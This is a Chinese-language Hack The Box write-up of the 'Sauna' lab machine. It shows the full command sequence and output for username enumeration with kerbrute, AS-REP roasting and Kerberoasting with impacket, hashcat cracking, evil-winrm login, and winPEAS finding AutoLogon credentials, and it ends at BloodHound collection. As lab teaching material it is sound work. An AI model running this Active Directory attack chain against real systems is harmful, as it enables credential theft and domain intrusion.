Sauna-htb-writeup

0x00 靶场技能介绍

章节技能:username-anarchy、网页用户名、kerbrute、域用户枚举、AsRepRoasting、hashcat、注册表内某个参数默认密码、kerberoasting、bloodhund、DCsync攻击

参考链接:官方引导模式提示信息

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.175

2、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.175
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-10 00:09 CST
Nmap scan report for 10.10.10.175
Host is up (0.14s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49749/tcp open  unknown
49772/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 20.68 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49675,49676,49677,49749,49772, 

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49675,49676,49677,49749,49772 -sC -sV --min-rate=10000 10.10.10.175                                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-10 00:13 CST
Nmap scan report for 10.10.10.175
Host is up (0.13s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-09 15:09:44Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49749/tcp open  msrpc         Microsoft Windows RPC
49772/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1h03m25s
| smb2-time: 
|   date: 2024-05-09T15:10:48
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.46 seconds

3、先看下80端口的情况吧

http://10.10.10.175/

http://10.10.10.175/single.html

1
2
3
4
Jenny Joy
James Doe
Johnson
Watson

http://10.10.10.175/about.html

1
2
3
4
5
6
Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver

http://10.10.10.175/contact.html

4、通过网上面,我们发现了一些用户名,先留着后续使用,我们先绑定下本地hosts信息

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.175 EGOTISTICAL-BANK.LOCAL" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.175 EGOTISTICAL-BANK.LOCAL

5、当我们拥有一些默认的用户名后,我们可以使用 username-anarchy 工具,再多关联一下用户,进行账号格式的组合。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
shiyan@InfoSec username-anarchy % ./username-anarchy -i ./name.txt
jenny
jennyjoy
jenny.joy
jennjoy
......
fergussmith
fergus.smith
fergussm
fergsmit
ferguss
f.smith
fsmith
sfergus
s.fergus
......
driver.s
driver.sophie
sd
shiyan@InfoSec username-anarchy %

6、然后我们使用 kerbrute 工具枚举下,看看哪些账号是在域中是存活的账号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./kerbrute userenum -d egotistical-bank.local --dc 10.10.10.175 ../list.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 05/10/24 - Ronnie Flathers @ropnop

2024/05/10 02:20:19 >  Using KDC(s):
2024/05/10 02:20:19 >   10.10.10.175:88

2024/05/10 02:20:20 >  [+] VALID USERNAME:       fsmith@egotistical-bank.local
2024/05/10 02:20:20 >  Done! Tested 116 usernames (1 valid) in 1.019 seconds

7、我去,那么多账号,就这一个账号存活,开始尝试下,是否存在as-reproasting漏洞吧

1
2
3
4
5
6
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-GetNPUsers -format hashcat -dc-ip 10.10.10.175 -request 'egotistical-bank.local/fsmith' -no-pass 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0a556391e31d0d84bd6368c3dc76808e$5b2fe3ca4b7847e0e51e157fdbe399f70583e42c31e08165f461a2ab61d33a56342fb009cf78d62cf5daf8600fc6c65ac2c5e4b74181ddadca8762f552037edbc8821243273247ef9189f734f266db2ce218da518fd8153c4e302cad8a93b960f595425c340f9e0facc109e5a0f09ef924ae2901daacb70154da8944b5c420dba0aecacefde66d6a6ac94229d37d34778fb6b0b29e4fd1b37faed9bd7bba7abc36d52c9476bfacc943da287231e827d9792e6028b90602fff3f0846a2f7a5c701a90f54b3ff698deb2152953e01eaebec97b968946aaefbde4fcbae037f219cf590083a6a8d95caad6fbee598393259f6041919731796361ed8076f1cf76d1b7

8、那就开始破解下哈希值吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
┌──(kali㉿offsec)-[~/Desktop]
└─$ touch hash 

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "kerberos"
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth                             | Network Protocol
  28800 | Kerberos 5, etype 17, DB                                   | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth                             | Network Protocol
  28900 | Kerberos 5, etype 18, DB                                   | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth                      | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP                               | Network Protocol
                                                                                                            
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 18200 ./hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0a556391e31d0d84bd6368c3dc76808e$5b2fe3ca4b7847e0e51e157fdbe399f70583e42c31e08165f461a2ab61d33a56342fb009cf78d62cf5daf8600fc6c65ac2c5e4b74181ddadca8762f552037edbc8821243273247ef9189f734f266db2ce218da518fd8153c4e302cad8a93b960f595425c340f9e0facc109e5a0f09ef924ae2901daacb70154da8944b5c420dba0aecacefde66d6a6ac94229d37d34778fb6b0b29e4fd1b37faed9bd7bba7abc36d52c9476bfacc943da287231e827d9792e6028b90602fff3f0846a2f7a5c701a90f54b3ff698deb2152953e01eaebec97b968946aaefbde4fcbae037f219cf590083a6a8d95caad6fbee598393259f6041919731796361ed8076f1cf76d1b7:Thestrokes23
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0a55639...76d1b7
Time.Started.....: Fri May 10 02:26:43 2024 (6 secs)
Time.Estimated...: Fri May 10 02:26:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1842.8 kH/s (0.46ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10537984/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Throy1 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 80%

Started: Fri May 10 02:26:32 2024

9、拿破解的账号密码,直接使用evil-winrm进行登录靶机

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.175 -u fsmith -p 'Thestrokes23'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents>

10、直接获取下第一个flag信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
*Evil-WinRM* PS C:\Users\FSmith\Documents> ls C:/Users


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/25/2020   1:05 PM                Administrator
d-----        1/23/2020   9:52 AM                FSmith
d-r---        1/22/2020   9:32 PM                Public
d-----        1/24/2020   4:05 PM                svc_loanmgr


*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         5/9/2024   7:45 AM             34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
af42672d722ddf2d3b394aa2be63045e
*Evil-WinRM* PS C:\Users\FSmith\Desktop>

0x02 系统权限获取

11、先枚举下当前用户信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
*Evil-WinRM* PS C:\Users\FSmith\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user fsmith
User name                    FSmith
Full Name                    Fergus Smith
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/23/2020 9:45:19 AM
Password expires             Never
Password changeable          1/24/2020 9:45:19 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/9/2024 1:28:24 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net localgroup

Aliases for \\SAUNA

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> 


*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\FSmith\Desktop>

12、信息量上不太多,还是上 winpeas.exe 工具批量枚举下吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
*Evil-WinRM* PS C:\Users\FSmith\Desktop> upload /home/kali/Desktop/tools/winPEASx64.exe
                                        
Info: Uploading /home/kali/Desktop/tools/winPEASx64.exe to C:\Users\FSmith\Desktop\winPEASx64.exe
                                        
Data: 3183272 bytes of 3183272 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ./winPEASx64.exe

=================================================================================================

   Computer Name           :   SAUNA
   User Name               :   HSmith
   User Id                 :   1103
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/22/2020 10:54:34 PM

=================================================================================================

   Computer Name           :   SAUNA
   User Name               :   svc_loanmgr
   User Id                 :   1108
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/24/2020 4:48:31 PM

=================================================================================================


Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

13、这里发现了个默认密码,还有几个状态正常的账号信息,下面检查下这几个账号信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user svc_loanmgr
User name                    svc_loanmgr
Full Name                    L Manager
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/24/2020 4:48:31 PM
Password expires             Never
Password changeable          1/25/2020 4:48:31 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> 


*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user HSmith
User name                    HSmith
Full Name                    Hugo Smith
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/22/2020 10:54:34 PM
Password expires             Never
Password changeable          1/23/2020 10:54:34 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\FSmith\Desktop>

14、看用户组也很普通,没啥情况,那继续尝试下 kerberoasting攻击吧

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-GetUserSPNs -request -dc-ip 10.10.10.175 egotistical-bank.local/fsmith:Thestrokes23
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 13:54:34.140321  <never>               

[-] CCache file is not found. Skipping...
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$egotistical-bank.local/HSmith*$cf98868809279887e2ad034a9d23cd4a$85212b1895397574cc5445dd617a63a0ff4746693d7718c141984a066830446ac0423b55e7074031db7984f0621a9eefe2c9ebfaac73c83bd9122f9b360e7a45e975453f9711b33c550185e94d18c4def816a5db45bb792f53d7c58e6b3fbf23c3072dc48bbcbb993195ce7fe0ca4825283e9c41c37e9bae8f961efa0b1d1ebd82403c017d0a67276094e475bc781ca8f088220c5b1e870cc72a1db25bc991fb2d241814008dff1d7e712b460c58eed1da4f82d58aa8bdecc99ce8456e2b7c67847c8a27437422ba2e2e433ace4f82b15f26c864a2537c54f97ac971973a1b59fe32dfbbd0438adcf437c733544be850e46fceea9e93f6d31c19ac8292cb78f24684d5581d02735f76663c4e335d92d1ea9aa8e9b47678d287561c49f38dc8fcd335b98782dec427e61acebed5b9d5ef674d980ca48b7da0f69fadcf50c34ebb999c5f1b8dddc4466adfb9f72b0ef986a7db20036cbff4c16a8658d2410bd6f351665a512feaa957edbce6ee70f8e6c2d6578e22ed5fb08d841c7d176ec0e0606ab807fd7e3335fc25c56a5601a951ca909fa6a4e2ec694b2900aabf87ab5ead17d6d830c2a0f38e79217e79db47e5862eee1e1c858c69ed7f49c1a2398b0df40baf22c844e609a59d1ec7faaffad2dabce0af00f7817628f7ce3e9f62bb3f5d5fe5a05be790a1b086c6988cedc8c79b43a77fc618a7c259c6458d2c790d587b2e4a80938c18fd4756d9f576c54ba97e5e95ff91eb0102ef48abc1bd1c7d13d5f2369619e27d613b9e2bfd2a70fa6fba2231b1b8987aaa35b465a5818be62d82ab4e6c3c7de24512b54e4390332c0354075e4f10b59f5ac905e4069a5004a67d731f5cf4214ae86ef0fa2967e144cd67e8e8370eb3cadf2a110fba65a725da0483c814f0ec2be895524038bf8bfb2fe53b22d7aa4599fd7d737ce4f079a0719ce8560db7e3b41d76e8eb7c854614248ee0ff893d47b8ef3f4d3f9a06e8c7673f3f6b55e047e4f15fda20c82e55916099d41a667622b91b62eb45527b377bc8ceabc806730a3f2e857b723b9080c0c1bd1662361e8b540a762eda10cadccc0db7c37cfc9845573afd30b13b9066c511f0263c051d211bec7e272ac7cf9790ca6e41b416df2db9bf55fcb37fbdfc1d8ea43b6445edae5b775dd95d9cfc3466e726830a0bf22e65e9d6c7348b70e1a2f0ea8d04c8f5587370900f0b2818fccda5892ea8bf8cd2efd5eaf382cff54cdc3b55ea0c68854c86d19e339b960d73cb7b512a8a6a10f5dbd2f0f07ac8bb12c7708fcce636ba26005b1ff50079f0c1774a71ae06f2dcb797f4410b3af65f401173ff0d1c96700fc00a2a3e2b35fb6012b961b051ef0cd23c8be6cc441bf54b635f3c9475e59ffd51c3fd17f8ea4c6b5ec5d671a8f3eea4

15、很好,获取另一个用户的信息了,这里继续哈希破解下吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "kerberos"
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth                             | Network Protocol
  28800 | Kerberos 5, etype 17, DB                                   | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth                             | Network Protocol
  28900 | Kerberos 5, etype 18, DB                                   | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth                      | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP                               | Network Protocol
                                                                                                                
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 13100 ./hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$egotistical-bank.local/HSmith*$cf98868809279887e2ad034a9d23cd4a$85212b1895397574cc5445dd617a63a0ff4746693d7718c141984a066830446ac0423b55e7074031db7984f0621a9eefe2c9ebfaac73c83bd9122f9b360e7a45e975453f9711b33c550185e94d18c4def816a5db45bb792f53d7c58e6b3fbf23c3072dc48bbcbb993195ce7fe0ca4825283e9c41c37e9bae8f961efa0b1d1ebd82403c017d0a67276094e475bc781ca8f088220c5b1e870cc72a1db25bc991fb2d241814008dff1d7e712b460c58eed1da4f82d58aa8bdecc99ce8456e2b7c67847c8a27437422ba2e2e433ace4f82b15f26c864a2537c54f97ac971973a1b59fe32dfbbd0438adcf437c733544be850e46fceea9e93f6d31c19ac8292cb78f24684d5581d02735f76663c4e335d92d1ea9aa8e9b47678d287561c49f38dc8fcd335b98782dec427e61acebed5b9d5ef674d980ca48b7da0f69fadcf50c34ebb999c5f1b8dddc4466adfb9f72b0ef986a7db20036cbff4c16a8658d2410bd6f351665a512feaa957edbce6ee70f8e6c2d6578e22ed5fb08d841c7d176ec0e0606ab807fd7e3335fc25c56a5601a951ca909fa6a4e2ec694b2900aabf87ab5ead17d6d830c2a0f38e79217e79db47e5862eee1e1c858c69ed7f49c1a2398b0df40baf22c844e609a59d1ec7faaffad2dabce0af00f7817628f7ce3e9f62bb3f5d5fe5a05be790a1b086c6988cedc8c79b43a77fc618a7c259c6458d2c790d587b2e4a80938c18fd4756d9f576c54ba97e5e95ff91eb0102ef48abc1bd1c7d13d5f2369619e27d613b9e2bfd2a70fa6fba2231b1b8987aaa35b465a5818be62d82ab4e6c3c7de24512b54e4390332c0354075e4f10b59f5ac905e4069a5004a67d731f5cf4214ae86ef0fa2967e144cd67e8e8370eb3cadf2a110fba65a725da0483c814f0ec2be895524038bf8bfb2fe53b22d7aa4599fd7d737ce4f079a0719ce8560db7e3b41d76e8eb7c854614248ee0ff893d47b8ef3f4d3f9a06e8c7673f3f6b55e047e4f15fda20c82e55916099d41a667622b91b62eb45527b377bc8ceabc806730a3f2e857b723b9080c0c1bd1662361e8b540a762eda10cadccc0db7c37cfc9845573afd30b13b9066c511f0263c051d211bec7e272ac7cf9790ca6e41b416df2db9bf55fcb37fbdfc1d8ea43b6445edae5b775dd95d9cfc3466e726830a0bf22e65e9d6c7348b70e1a2f0ea8d04c8f5587370900f0b2818fccda5892ea8bf8cd2efd5eaf382cff54cdc3b55ea0c68854c86d19e339b960d73cb7b512a8a6a10f5dbd2f0f07ac8bb12c7708fcce636ba26005b1ff50079f0c1774a71ae06f2dcb797f4410b3af65f401173ff0d1c96700fc00a2a3e2b35fb6012b961b051ef0cd23c8be6cc441bf54b635f3c9475e59ffd51c3fd17f8ea4c6b5ec5d671a8f3eea4:Thestrokes23
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$egotisti...f3eea4
Time.Started.....: Fri May 10 17:17:04 2024 (4 secs)
Time.Estimated...: Fri May 10 17:17:08 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2482.7 kH/s (0.34ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10537984/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Throy1 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 74%

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Fri May 10 17:17:03 2024
Stopped: Fri May 10 17:17:10 2024

16、我去,密码复用????这么简单的,我都没想到。。。。

17、经枚举,这上面两个账号确实无法远程登录,那就只能继续枚举了,尝试使用bloodhound-python 这个工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿offsec)-[~/Desktop]
└─$ bloodhound-python -u HSmith -p 'Thestrokes23' -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c all --zip
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (SAUNA.EGOTISTICAL-BANK.LOCAL:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
